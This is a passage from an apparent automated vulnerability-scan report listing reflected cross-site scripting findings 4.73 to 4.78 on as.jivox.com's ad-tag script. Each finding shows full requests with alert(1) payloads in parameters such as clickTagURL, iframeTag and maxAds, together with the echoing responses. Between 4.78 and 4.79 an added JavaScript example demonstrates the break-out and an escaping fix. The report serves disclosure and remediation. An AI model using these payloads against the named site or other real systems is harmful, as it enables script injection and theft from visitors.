GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comc841c'%3balert(1)//719d9a49b95&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:12 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
hYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.comc841c';alert(1)//719d9a49b95" target="_blank">
...[SNIP]...

4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa1a"-alert(1)-"d02b9250581 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
mNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.
...[SNIP]...

4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the iframeTag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec57f"-alert(1)-"6c64bcf253 was submitted in the iframeTag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:57 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5Nj
...[SNIP]...

4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the jivoxBranded request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b6e"-alert(1)-"b2e0605808c was submitted in the jivoxBranded parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
kMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=130796302
...[SNIP]...

4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the maxAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 251ba"-alert(1)-"51984580583 was submitted in the maxAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:24 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.
...[SNIP]...

4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65140"-alert(1)-"00b5d1dee29 was submitted in the mouseAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:16 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
HN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=
...[SNIP]...

4.78. http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78c54"-alert(1)-"6fea4a27bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57663
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
e=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&78c54"-alert(1)-"6fea4a27bbd=1&jvxSessionId=1307963049.2948");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}
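
The finding above, and 4.82 to 4.88 below, all come down to one pattern: the raw query string is concatenated into a double-quoted JavaScript string literal. The block that follows is an added example, not code from the XSS.CX report or from Jivox; the template is a stand-in for the setFlashVariables("...") line in the response, and the probe and query string are constructed to resemble the 4.78 request. It shows the break-out the scanner detected, a serialiser that makes the same value inert in that context, and the byte-for-byte reflection check that the "echoed unmodified" wording refers to.

```javascript
// Added example: not the report's or Jivox's code. The template below is a
// stand-in for the jvxAdPlayer.setFlashVariables("...") line in the response.

// Vulnerable rendering: the raw query string lands inside a double-quoted
// JavaScript string literal without any encoding.
function renderUnsafe(rawQuery) {
  return 'jvxAdPlayer.setFlashVariables("' + rawQuery + '");';
}

// Safe rendering: JSON.stringify yields a valid JS string literal (quotes,
// backslashes and control characters escaped). The extra replacements cover
// what JSON alone misses when the literal is embedded in script text served
// to a browser: "</script>" inside the literal, and the U+2028/U+2029 line
// terminators, which older engines refused inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(rawQuery) {
  return 'jvxAdPlayer.setFlashVariables(' + jsStringLiteral(rawQuery) + ');';
}

// The scanner's test: is the probe present in the response byte-for-byte?
function reflectsUnmodified(responseBody, probe) {
  return responseBody.indexOf(probe) !== -1;
}

// Count double-quoted literals in one line of JS. A correct rendering has
// exactly one; a break-out splits it into two with bare code in between.
function countDoubleQuotedLiterals(jsLine) {
  const literals = jsLine.match(/"(?:[^"\\]|\\.)*"/g);
  return literals ? literals.length : 0;
}

// Constructed inputs modelled on the 4.78 probe (not the captured traffic).
const PROBE = '78c54"-alert(1)-"6fea4a27bbd';
const QUERY = 'objectName=jvxAdPlayer&pauseBetweenAds=1000&' + PROBE + '=1';

function demo() {
  const unsafe = renderUnsafe(QUERY);
  const safe = renderSafe(QUERY);
  return {
    unsafeReflects: reflectsUnmodified(unsafe, PROBE),  // true
    safeReflects: reflectsUnmodified(safe, PROBE),      // false
    unsafeLiterals: countDoubleQuotedLiterals(unsafe),  // 2
    safeLiterals: countDoubleQuotedLiterals(safe),      // 1
    // The encoded literal still decodes to the original value.
    roundTrip: JSON.parse(jsStringLiteral(QUERY)) === QUERY,
  };
}

console.log(demo());
```

The encoder is only half of the fix: it makes the value inert inside the string, but the values themselves (numeric counts, flags, URLs) should still be validated against their expected format before they get anywhere near the template.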


4.79. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

